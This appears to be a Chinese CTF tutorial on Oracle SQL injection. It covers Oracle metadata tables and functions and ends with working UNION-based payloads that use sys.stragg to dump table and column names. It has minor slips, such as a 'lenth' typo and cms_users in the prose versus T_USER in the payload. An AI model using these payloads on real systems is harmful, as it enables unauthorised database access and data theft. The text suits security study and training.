CTF-Web：Oracle SQL 注入

相关的函数和表
Oracle 注入样例

相关的函数和表#

Oracle 的 SQL 注入和 MySQL 是一样的，不同在于数据库信息所在的表和一些函数不一样。

内置函数#

函数	功能
lenth(）	返回字符串的长度
count（）	返回在给定的选择中被选的行数
ascii()	表示将字符转换为 ASCII 码
substr()	返回值为源字符串中指定起始位置和长度的字符串
chr()	表示将 ASCII 码转换为字符

内置数据表#

Oracle 查询需要带上表名，如“select * from xxx”。Oracle 有一个万能的表——dual 表，Oracle 保证 dual 里面永远只有一条记录。

内置数据表	说明
dual 表	是一个虚拟的表，用来构成 select 的语法规则
user tables 表	该表的 table_name 列存放着当前数据库的所有表
user tab columns 表	该表的 column_name 存放着表的所有列

单行子查询返回多行需使用 where rownum = 1 来规范，Oracle 数据库从数据文件或缓冲区中读取数据的顺序。

内置语句#

获取数据#

获取所有用户名：

Copy Highlighter-hljs
SQL> select username from all_users;

获取数据库版本：

Copy Highlighter-hljs
SQL> select banner from sys.v_$version;

获取当前登录的用户：

Copy Highlighter-hljs
SQL> select user from dual;

字符串拼接#

使用 || 来进行字符串的拼接，当 || 使用失败时，可以使用 || 的 URL 编码 %7C%7C，下面的 sql 语句可以拼接出字符串“admin”。

Copy Highlighter-hljs
SQL> select 'a'||'d'||'m'||'i'||'n'from dual;

下面的 sql 语句同理。

Copy Highlighter-hljs
SQL> select chr(97)||chr(100)||chr(109)||chr(105)||chr(110) from dual;

使用 sys.stragg() 函数来在单行中获取所有行信息：

Copy Highlighter-hljs
SQL> select username from all_users;

下面的语句也能使多行结果以一行显示，并用(--'隔开)

Copy Highlighter-hljs
SQL> select sys.stragg(username||'--')from all_users;

Oracle 注入样例#

判断注入类型#

首先判断注入点，suser 和 sname 都可能可以注入。

使用单引号闭合，网页返回报错信息。

构造恒真条件，数据库返回正常的数据，说明此处存在单引号闭合的字符型注入。

判断列数#

判断表有几列，使用 ORDER BY 子句进行一个排序，看一下对几列有效。

判断哪些列是我们能用的，令参数的查询不到结果，然后使用 UNION 进行组合查询。

获取数据库信息#

接下来开始爆表名，在 user_tables 进行查询，使用 sys.stragg() 函数合并查询结果。

Copy Highlighter-hljs
' union select (select sys.stragg(table_name) from user_tables),null,null from dual --

接下来爆 cms_users 表的字段，在 user_tab_columns 爆出来，注意使用 sys.stragg() 函数时“||”要转码一下。

Copy Highlighter-hljs
' union select (select sys.stragg(column_name%7c%7c'--') from user_tab_columns where table_name='T_USER'),null,null from dual --